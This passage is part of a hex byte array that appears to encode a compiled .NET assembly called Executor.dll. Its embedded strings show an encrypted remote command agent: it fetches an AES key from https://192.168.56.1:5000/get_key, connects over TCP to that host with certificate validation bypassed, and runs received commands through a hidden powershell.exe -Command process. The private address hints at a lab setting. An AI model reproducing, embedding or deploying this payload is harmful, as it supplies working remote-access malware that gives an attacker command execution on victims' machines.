x00,0x00,0x00,0x00,0x00,0x06,0x00,0x31,0x02,0xdf,0x04,0x06,0x00,0x9c,0x02,0xdf,0x04,0x06,0x00,0x61,0x01,0xc8,0x04,0x0f,0x00,0xff,0x04,0x00,0x00,0x06,0x00,0x9e,0x01,0xdc,0x02,0x06,0x00,0x83,0x02,0xc8,0x03,0x06,0x00,0xfa,0x01,0xc8,0x03,0x06,0x00,0xb7,0x01,0xc8,0x03,0x06,0x00,0xd4,0x01,0xc8,0x03,0x06,0x00,0x51,0x02,0xc8,0x03,0x06,0x00,0x87,0x01,0xc8,0x03,0x06,0x00,0x19,0x02,0xdf,0x04,0x06,0x00,0x6a,0x02,0xdf,0x04,0x06,0x00,0x75,0x01,0xdf,0x04,0x06,0x00,0xae,0x05,0x93,0x03,0x0a,0x00,0xad,0x03,0x93,0x06,0x06,0x00,0x86,0x03,0x4e,0x00,0x0a,0x00,0x6f,0x03,0x93,0x06,0x06,0x00,0x3f,0x04,0x4e,0x00,0x06,0x00,0x13,0x04,0x4e,0x00,0x0a,0x00,0xdb,0x04,0x93,0x06,0x0e,0x00,0xe1,0x05,0x86,0x05,0x0e,0x00,0x61,0x03,0x86,0x05,0x06,0x00,0xda,0x03,0x93,0x03,0x12,0x00,0x7e,0x05,0xc8,0x04,0x06,0x00,0x46,0x01,0xdf,0x04,0x16,0x00,0x08,0x03,0xb0,0x06,0x0a,0x00,0x29,0x01,0x0e,0x05,0x0a,0x00,0xbe,0x03,0x0e,0x05,0x1a,0x00,0x5b,0x05,0xb0,0x06,0x06,0x00,0x8c,0x03,0x4e,0x00,0x0a,0x00,0xc1,0x00,0x93,0x06,0x06,0x00,0x4c,0x04,0x4e,0x00,0x06,0x00,0xf9,0x00,0x93,0x03,0x06,0x00,0x20,0x04,0x4e,0x00,0x1e,0x00,0x2b,0x04,0xb5,0x05,0x22,0x00,0xd7,0x05,0xb5,0x05,0x0a,0x00,0x9a,0x03,0x93,0x06,0x06,0x00,0xd3,0x02,0x47,0x06,0x0a,0x00,0xd2,0x00,0x93,0x06,0x06,0x00,0xce,0x02,0x93,0x03,0x26,0x00,0xee,0x00,0x07,0x04,0x06,0x00,0x16,0x00,0x77,0x00,0x06,0x00,0x57,0x04,0x93,0x03,0x06,0x00,0xf6,0x02,0x93,0x03,0x12,0x00,0xf6,0x03,0xc8,0x04,0x00,0x00,0x00,0x00,0x45,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x10,0x00,0xbf,0x04,0x00,0x00,0x3d,0x00,0x01,0x00,0x01,0x00,0x03,0x21,0x10,0x00,0x73,0x00,0x00,0x00,0x3d,0x00,0x01,0x00,0x06,0x00,0x36,0x00,0x2d,0x00,0x30,0x01,0x16,0x00,0x01,0x00,0x34,0x01,0x50,0x20,0x00,0x00,0x00,0x00,0x91,0x00,0x0b,0x06,0x38,0x01,0x01,0x00,0xbc,0x20,0x00,0x00,0x00,0x00,0x91,0x00,0x03,0x06,0x40,0x01,0x03,0x00,0x20,0x21,0x00,0x00,0x00,0x00,0x96,0x00,0xe4,0x03,0x48,0x01,0x05,0x00,0xf8,0x22,0x00,0x00,0x00,0x00,0x91,0x00,0xa1,0x00,0x4c,0x01,0x05,0x00,0x75,0x23,0x00,0x00,0x00,0x00,0x86,0x18,0x7e,0x04,0x06,0x00,0x06,0x00,0x7e,0x23,0x00,0x00,0x00,0x00,0x91,0x18,0x84,0x04,0x48,0x01,0x06,0x00,0x8a,0x23,0x00,0x00,0x00,0x00,0x86,0x18,0x7e,0x04,0x06,0x00,0x06,0x00,0x94,0x23,0x00,0x00,0x00,0x00,0x83,0x00,0x0a,0x00,0x51,0x01,0x06,0x00,0x00,0x00,0x01,0x00,0x53,0x06,0x00,0x00,0x02,0x00,0xb5,0x04,0x00,0x00,0x01,0x00,0x5d,0x06,0x00,0x00,0x02,0x00,0x9b,0x04,0x00,0x00,0x01,0x00,0xb0,0x00,0x00,0x00,0x01,0x00,0x31,0x00,0x00,0x00,0x02,0x00,0x36,0x00,0x00,0x00,0x03,0x00,0x3b,0x00,0x00,0x00,0x04,0x00,0x40,0x00,0x09,0x00,0x7e,0x04,0x01,0x00,0x11,0x00,0x7e,0x04,0x06,0x00,0x19,0x00,0x7e,0x04,0x0a,0x00,0x29,0x00,0x7e,0x04,0x10,0x00,0x31,0x00,0x7e,0x04,0x10,0x00,0x39,0x00,0x7e,0x04,0x10,0x00,0x41,0x00,0x7e,0x04,0x10,0x00,0x49,0x00,0x7e,0x04,0x10,0x00,0x51,0x00,0x7e,0x04,0x10,0x00,0x59,0x00,0x7e,0x04,0x10,0x00,0x61,0x00,0x7e,0x04,0x01,0x00,0x69,0x00,0x7e,0x04,0x15,0x00,0x71,0x00,0x7e,0x04,0x15,0x00,0xd1,0x00,0x7e,0x04,0x06,0x00,0x89,0x00,0x7e,0x04,0x06,0x00,0x91,0x00,0x7e,0x04,0x25,0x00,0x99,0x00,0x7e,0x04,0x30,0x00,0x09,0x01,0x40,0x01,0x10,0x00,0x11,0x01,0x21,0x01,0x06,0x00,0x89,0x00,0x7b,0x06,0x36,0x00,0x89,0x00,0x7e,0x04,0x45,0x00,0xa1,0x00,0x7e,0x04,0x30,0x00,0x19,0x01,0x97,0x00,0x4b,0x00,0xa9,0x00,0x39,0x01,0x68,0x00,0xd9,0x00,0x7e,0x04,0x6d,0x00,0x21,0x01,0x2c,0x03,0x73,0x00,0x29,0x01,0x7e,0x04,0x06,0x00,0x29,0x01,0x66,0x00,0x79,0x00,0x31,0x01,0x8b,0x06,0x45,0x00,0x39,0x01,0x24,0x00,0x7f,0x00,0x39,0x01,0x3c,0x05,0x79,0x00,0x31,0x01,0x5f,0x00,0x45,0x00,0x31,0x01,0xb8,0x00,0x85,0x00,0x31,0x01,0x83,0x06,0x36,0x00,0x31,0x01,0x58,0x00,0x36,0x00,0x31,0x01,0xa5,0x04,0x8c,0x00,0x31,0x01,0x8b,0x04,0x8c,0x00,0xb1,0x00,0x7e,0x04,0x95,0x00,0xb1,0x00,0x7c,0x03,0x9b,0x00,0xf9,0x00,0x92,0x00,0xa0,0x00,0x51,0x01,0xe9,0x00,0xa8,0x00,0x51,0x01,0x7b,0x06,0xbf,0x00,0x61,0x01,0x3c,0x05,0xcd,0x00,0x51,0x01,0xa7,0x05,0xd3,0x00,0xf9,0x00,0x40,0x01,0xec,0x00,0xc1,0x00,0xdd,0x00,0x4b,0x00,0x69,0x01,0xfd,0x02,0xf4,0x00,0xc9,0x00,0x7e,0x04,0x06,0x00,0x71,0x01,0x7e,0x04,0x06,0x00,0x71,0x01,0x05,0x01,0x10,0x00,0x69,0x01,0xa7,0x05,0xff,0x00,0x71,0x01,0x99,0x05,0x10,0x00,0x71,0x01,0x2c,0x06,0x05,0x01,0x71,0x01,0xba,0x02,0x05,0x01,0x71,0x01,0x68,0x06,0x05,0x01,0x71,0x01,0x64,0x04,0x05,0x01,0xc9,0x00,0xe8,0x03,0x0a,0x01,0xc9,0x00,0x13,0x06,0x11,0x01,0xc9,0x00,0x19,0x06,0x15,0x01,0xc9,0x00,0xc0,0x05,0x06,0x00,0x79,0x00,0x7e,0x04,0x06,0x00,0x21,0x00,0x6b,0x00,0x2b,0x02,0x27,0x00,0x5b,0x00,0x3c,0x02,0x2e,0x00,0x0b,0x00,0x5c,0x01,0x2e,0x00,0x13,0x00,0x65,0x01,0x2e,0x00,0x1b,0x00,0x84,0x01,0x2e,0x00,0x23,0x00,0x8d,0x01,0x2e,0x00,0x2b,0x00,0xcb,0x01,0x2e,0x00,0x33,0x00,0xd9,0x01,0x2e,0x00,0x3b,0x00,0xe4,0x01,0x2e,0x00,0x43,0x00,0xf1,0x01,0x2e,0x00,0x4b,0x00,0xcb,0x01,0x2e,0x00,0x53,0x00,0xcb,0x01,0x41,0x00,0x6b,0x00,0x2b,0x02,0x43,0x00,0x63,0x00,0x31,0x02,0x43,0x00,0x6b,0x00,0x2b,0x02,0x63,0x00,0x73,0x00,0x37,0x02,0xc4,0x00,0x6b,0x00,0x31,0x02,0x00,0x01,0x63,0x00,0x25,0x02,0x1a,0x00,0x3b,0x00,0x4f,0x00,0xf8,0x00,0x1a,0x01,0x04,0x80,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xbf,0x04,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x12,0x01,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x93,0x06,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x86,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x6b,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0xb0,0x06,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x45,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x27,0x01,0xeb,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x27,0x01,0xcc,0x05,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x07,0x04,0x00,0x00,0x00,0x00,0x03,0x00,0x02,0x00,0x53,0x00,0xbb,0x00,0x55,0x00,0xbb,0x00,0x59,0x00,0xbb,0x00,0x00,0x00,0x00,0x00,0x00,0x3c,0x3e,0x39,0x5f,0x5f,0x32,0x5f,0x30,0x00,0x3c,0x52,0x75,0x6e,0x3e,0x62,0x5f,0x5f,0x32,0x5f,0x30,0x00,0x49,0x45,0x6e,0x75,0x6d,0x65,0x72,0x61,0x62,0x6c,0x65,0x60,0x31,0x00,0x67,0x65,0x74,0x5f,0x55,0x54,0x46,0x38,0x00,0x3c,0x3e,0x39,0x00,0x3c,0x70,0x30,0x3e,0x00,0x3c,0x70,0x31,0x3e,0x00,0x3c,0x70,0x32,0x3e,0x00,0x3c,0x70,0x33,0x3e,0x00,0x3c,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x49,0x4f,0x00,0x67,0x65,0x74,0x5f,0x49,0x56,0x00,0x73,0x65,0x74,0x5f,0x49,0x56,0x00,0x44,0x6f,0x77,0x6e,0x6c,0x6f,0x61,0x64,0x44,0x61,0x74,0x61,0x00,0x3c,0x3e,0x63,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x43,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x47,0x65,0x6e,0x65,0x72,0x69,0x63,0x00,0x52,0x65,0x61,0x64,0x00,0x52,0x65,0x61,0x64,0x54,0x6f,0x45,0x6e,0x64,0x00,0x45,0x78,0x65,0x63,0x75,0x74,0x65,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x63,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x00,0x73,0x65,0x74,0x5f,0x4d,0x6f,0x64,0x65,0x00,0x43,0x72,0x79,0x70,0x74,0x6f,0x53,0x74,0x72,0x65,0x61,0x6d,0x4d,0x6f,0x64,0x65,0x00,0x43,0x69,0x70,0x68,0x65,0x72,0x4d,0x6f,0x64,0x65,0x00,0x67,0x65,0x74,0x5f,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0x54,0x61,0x6b,0x65,0x00,0x45,0x6e,0x75,0x6d,0x65,0x72,0x61,0x62,0x6c,0x65,0x00,0x49,0x44,0x69,0x73,0x70,0x6f,0x73,0x61,0x62,0x6c,0x65,0x00,0x73,0x65,0x74,0x5f,0x46,0x69,0x6c,0x65,0x4e,0x61,0x6d,0x65,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x00,0x44,0x69,0x73,0x70,0x6f,0x73,0x65,0x00,0x58,0x35,0x30,0x39,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x00,0x57,0x72,0x69,0x74,0x65,0x00,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x65,0x72,0x47,0x65,0x6e,0x65,0x72,0x61,0x74,0x65,0x64,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x44,0x65,0x62,0x75,0x67,0x67,0x61,0x62,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x4e,0x75,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x54,0x69,0x74,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x54,0x61,0x72,0x67,0x65,0x74,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x46,0x69,0x6c,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x61,0x6c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x6e,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x52,0x65,0x66,0x53,0x61,0x66,0x65,0x74,0x79,0x52,0x75,0x6c,0x65,0x73,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x61,0x74,0x69,0x6f,0x6e,0x52,0x65,0x6c,0x61,0x78,0x61,0x74,0x69,0x6f,0x6e,0x73,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x50,0x72,0x6f,0x64,0x75,0x63,0x74,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x4e,0x75,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x43,0x6f,0x6e,0x74,0x65,0x78,0x74,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x6d,0x70,0x61,0x6e,0x79,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x43,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x69,0x6c,0x69,0x74,0x79,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x00,0x73,0x65,0x74,0x5f,0x55,0x73,0x65,0x53,0x68,0x65,0x6c,0x6c,0x45,0x78,0x65,0x63,0x75,0x74,0x65,0x00,0x42,0x79,0x74,0x65,0x00,0x45,0x6e,0x63,0x6f,0x64,0x69,0x6e,0x67,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x69,0x6e,0x67,0x00,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x67,0x65,0x74,0x5f,0x4c,0x65,0x6e,0x67,0x74,0x68,0x00,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x56,0x61,0x6c,0x69,0x64,0x61,0x74,0x69,0x6f,0x6e,0x43,0x61,0x6c,0x6c,0x62,0x61,0x63,0x6b,0x00,0x73,0x65,0x74,0x5f,0x53,0x65,0x72,0x76,0x65,0x72,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x56,0x61,0x6c,0x69,0x64,0x61,0x74,0x69,0x6f,0x6e,0x43,0x61,0x6c,0x6c,0x62,0x61,0x63,0x6b,0x00,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x2e,0x64,0x6c,0x6c,0x00,0x4e,0x65,0x74,0x77,0x6f,0x72,0x6b,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x43,0x72,0x79,0x70,0x74,0x6f,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x47,0x65,0x74,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x53,0x74,0x72,0x65,0x61,0x6d,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x53,0x79,0x6d,0x6d,0x65,0x74,0x72,0x69,0x63,0x41,0x6c,0x67,0x6f,0x72,0x69,0x74,0x68,0x6d,0x00,0x49,0x43,0x72,0x79,0x70,0x74,0x6f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x00,0x58,0x35,0x30,0x39,0x43,0x68,0x61,0x69,0x6e,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x00,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x00,0x52,0x75,0x6e,0x00,0x73,0x65,0x74,0x5f,0x53,0x74,0x61,0x72,0x74,0x49,0x6e,0x66,0x6f,0x00,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x49,0x6e,0x66,0x6f,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4c,0x69,0x6e,0x71,0x00,0x53,0x74,0x72,0x65,0x61,0x6d,0x52,0x65,0x61,0x64,0x65,0x72,0x00,0x54,0x65,0x78,0x74,0x52,0x65,0x61,0x64,0x65,0x72,0x00,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x6f,0x69,0x6e,0x74,0x4d,0x61,0x6e,0x61,0x67,0x65,0x72,0x00,0x53,0x74,0x72,0x65,0x61,0x6d,0x57,0x72,0x69,0x74,0x65,0x72,0x00,0x54,0x65,0x78,0x74,0x57,0x72,0x69,0x74,0x65,0x72,0x00,0x42,0x69,0x74,0x43,0x6f,0x6e,0x76,0x65,0x72,0x74,0x65,0x72,0x00,0x73,0x65,0x74,0x5f,0x52,0x65,0x64,0x69,0x72,0x65,0x63,0x74,0x53,0x74,0x61,0x6e,0x64,0x61,0x72,0x64,0x45,0x72,0x72,0x6f,0x72,0x00,0x2e,0x63,0x74,0x6f,0x72,0x00,0x2e,0x63,0x63,0x74,0x6f,0x72,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x44,0x65,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x64,0x65,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x45,0x6e,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x65,0x6e,0x63,0x72,0x79,0x70,0x74,0x6f,0x72,0x00,0x45,0x78,0x65,0x63,0x75,0x74,0x6f,0x72,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x44,0x69,0x61,0x67,0x6e,0x6f,0x73,0x74,0x69,0x63,0x73,0x00,0x41,0x65,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x65,0x72,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x73,0x00,0x44,0x65,0x62,0x75,0x67,0x67,0x69,0x6e,0x67,0x4d,0x6f,0x64,0x65,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x53,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x2e,0x43,0x72,0x79,0x70,0x74,0x6f,0x67,0x72,0x61,0x70,0x68,0x79,0x2e,0x58,0x35,0x30,0x39,0x43,0x65,0x72,0x74,0x69,0x66,0x69,0x63,0x61,0x74,0x65,0x73,0x00,0x47,0x65,0x74,0x42,0x79,0x74,0x65,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x50,0x72,0x69,0x6d,0x69,0x74,0x69,0x76,0x65,0x73,0x00,0x53,0x73,0x6c,0x50,0x6f,0x6c,0x69,0x63,0x79,0x45,0x72,0x72,0x6f,0x72,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x44,0x69,0x61,0x67,0x6e,0x6f,0x73,0x74,0x69,0x63,0x73,0x2e,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x53,0x6f,0x63,0x6b,0x65,0x74,0x73,0x00,0x73,0x65,0x74,0x5f,0x41,0x72,0x67,0x75,0x6d,0x65,0x6e,0x74,0x73,0x00,0x43,0x6f,0x6e,0x63,0x61,0x74,0x00,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x00,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x45,0x78,0x69,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x57,0x65,0x62,0x43,0x6c,0x69,0x65,0x6e,0x74,0x00,0x54,0x63,0x70,0x43,0x6c,0x69,0x65,0x6e,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x53,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x6f,0x69,0x6e,0x74,0x00,0x44,0x65,0x63,0x72,0x79,0x70,0x74,0x00,0x45,0x6e,0x63,0x72,0x79,0x70,0x74,0x00,0x53,0x74,0x61,0x72,0x74,0x00,0x67,0x65,0x74,0x5f,0x53,0x74,0x61,0x6e,0x64,0x61,0x72,0x64,0x4f,0x75,0x74,0x70,0x75,0x74,0x00,0x73,0x65,0x74,0x5f,0x52,0x65,0x64,0x69,0x72,0x65,0x63,0x74,0x53,0x74,0x61,0x6e,0x64,0x61,0x72,0x64,0x4f,0x75,0x74,0x70,0x75,0x74,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x54,0x65,0x78,0x74,0x00,0x70,0x6c,0x61,0x69,0x6e,0x74,0x65,0x78,0x74,0x00,0x63,0x69,0x70,0x68,0x65,0x72,0x74,0x65,0x78,0x74,0x00,0x73,0x65,0x74,0x5f,0x43,0x72,0x65,0x61,0x74,0x65,0x4e,0x6f,0x57,0x69,0x6e,0x64,0x6f,0x77,0x00,0x54,0x6f,0x41,0x72,0x72,0x61,0x79,0x00,0x67,0x65,0x74,0x5f,0x4b,0x65,0x79,0x00,0x73,0x65,0x74,0x5f,0x4b,0x65,0x79,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x53,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x2e,0x43,0x72,0x79,0x70,0x74,0x6f,0x67,0x72,0x61,0x70,0x68,0x79,0x00,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x4e,0x65,0x74,0x2e,0x53,0x65,0x63,0x75,0x72,0x69,0x74,0x79,0x00,0x00,0x43,0x68,0x00,0x74,0x00,0x74,0x00,0x70,0x00,0x73,0x00,0x3a,0x00,0x2f,0x00,0x2f,0x00,0x31,0x00,0x39,0x00,0x32,0x00,0x2e,0x00,0x31,0x00,0x36,0x00,0x38,0x00,0x2e,0x00,0x35,0x00,0x36,0x00,0x2e,0x00,0x31,0x00,0x3a,0x00,0x35,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2f,0x00,0x67,0x00,0x65,0x00,0x74,0x00,0x5f,0x00,0x6b,0x00,0x65,0x00,0x79,0x00,0x00,0x21,0x5a,0x00,0x36,0x00,0x4c,0x00,0x68,0x00,0x46,0x00,0x44,0x00,0x69,0x00,0x43,0x00,0x67,0x00,0x66,0x00,0x4f,0x00,0x42,0x00,0x38,0x00,0x48,0x00,0x4e,0x00,0x4b,0x00,0x00,0x19,0x31,0x00,0x39,0x00,0x32,0x00,0x2e,0x00,0x31,0x00,0x36,0x00,0x38,0x00,0x2e,0x00,0x35,0x00,0x36,0x00,0x2e,0x00,0x31,0x00,0x00,0x1d,0x70,0x00,0x6f,0x00,0x77,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x68,0x00,0x65,0x00,0x6c,0x00,0x6c,0x00,0x2e,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x13,0x2d,0x00,0x43,0x00,0x6f,0x00,0x6d,0x00,0x6d,0x00,0x61,0x00,0x6e,0x00,0x64,0x00,0x20,0x00,0x01,0x00,0xf7,0x24,0x5a,0x59,0xd3,0xb7,0x67,0x47,0xa2,0x92,0x2f,0xe7,0x06,0xc9,0xca,0x84,0x00,0x04,0x20,0x01,0x01,0x08,0x03,0x20,0x00,0x01,0x05,0x20,0x01,0x01,0x11,0x11,0x04,0x20,0x01,0x01,0x0e,0x04,0x20,0x01,0x01,0x05,0x0a,0x07,0x04,0x12,0x45,0x12,0x49,0x12,0x4d,0x1d,0x05,0x0a,0x20,0x03,0x01,0x12,0x7d,0x12,0x41,0x11,0x80,0x81,0x05,0x20,0x01,0x01,0x12,0x7d,0x04,0x20,0x00,0x1d,0x05,0x09,0x07,0x04,0x12,0x45,0x12,0x49,0x12,0x51,0x0e,0x05,0x20,0x01,0x01,0x1d,0x05,0x03,0x20,0x00,0x0e,0x18,0x07,0x0d,0x12,0x55,0x12,0x41,0x12,0x41,0x12,0x59,0x12,0x5d,0x1d,0x05,0x08,0x0e,0x0e,0x1d,0x05,0x1d,0x05,0x02,0x12,0x61,0x04,0x00,0x00,0x12,0x55,0x05,0x20,0x02,0x01,0x1c,0x18,0x05,0x00,0x01,0x01,0x12,0x6d,0x05,0x20,0x01,0x1d,0x05,0x0e,0x05,0x00,0x00,0x12,0x80,0x9d,0x06,0x20,0x01,0x01,0x11,0x80,0xa1,0x08,0x20,0x02,0x12,0x41,0x1d,0x05,0x1d,0x05,0x05,0x20,0x02,0x01,0x0e,0x08,0x04,0x20,0x00,0x12,0x5d,0x07,0x20,0x03,0x08,0x1d,0x05,0x08,0x08,0x12,0x10,0x01,0x02,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x08,0x03,0x0a,0x01,0x05,0x0d,0x10,0x01,0x01,0x1d,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x05,0x00,0x01,0x1d,0x05,0x08,0x18,0x10,0x01,0x02,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x15,0x12,0x80,0xad,0x01,0x1e,0x00,0x07,0x20,0x03,0x01,0x1d,0x05,0x08,0x08,0x03,0x20,0x00,0x08,0x06,0x07,0x03,0x12,0x65,0x0e,0x0e,0x05,0x00,0x02,0x0e,0x0e,0x0e,0x04,0x20,0x01,0x01,0x02,0x06,0x20,0x01,0x01,0x12,0x80,0xb9,0x03,0x20,0x00,0x02,0x04,0x20,0x00,0x12,0x51,0x03,0x07,0x01,0x02,0x08,0xb0,0x3f,0x5f,0x7f,0x11,0xd5,0x0a,0x3a,0x08,0xcc,0x7b,0x13,0xff,0xcd,0x2d,0xdd,0x51,0x03,0x06,0x12,0x0c,0x03,0x06,0x12,0x6d,0x07,0x00,0x02,0x1d,0x05,0x0e,0x12,0x41,0x07,0x00,0x02,0x0e,0x1d,0x05,0x12,0x41,0x03,0x00,0x00,0x01,0x04,0x00,0x01,0x0e,0x0e,0x0a,0x20,0x04,0x02,0x1c,0x12,0x71,0x12,0x75,0x11,0x79,0x08,0x01,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x1e,0x01,0x00,0x01,0x00,0x54,0x02,0x16,0x57,0x72,0x61,0x70,0x4e,0x6f,0x6e,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x54,0x68,0x72,0x6f,0x77,0x73,0x01,0x08,0x01,0x00,0x07,0x01,0x00,0x00,0x00,0x00,0x3d,0x01,0x00,0x18,0x2e,0x4e,0x45,0x54,0x43,0x6f,0x72,0x65,0x41,0x70,0x70,0x2c,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3d,0x76,0x38,0x2e,0x30,0x01,0x00,0x54,0x0e,0x14,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x44,0x69,0x73,0x70,0x6c,0x61,